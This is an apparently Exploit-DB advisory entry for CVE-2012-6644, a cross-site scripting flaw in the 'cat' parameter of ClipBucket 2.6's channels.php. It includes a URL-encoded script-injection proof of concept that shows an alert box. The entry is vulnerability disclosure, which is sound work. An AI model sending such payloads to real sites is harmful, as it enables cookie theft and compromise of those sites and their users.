ClipBucket 2.6 channels.php cat Parameter XSS

2012-01-09T00:00:00
ID EDB-ID:36524
Type exploitdb
Reporter YaDoY666
Modified 2012-01-09T00:00:00

Description

ClipBucket 2.6 channels.php cat Parameter XSS. CVE-2012-6644. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/51321/info

ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time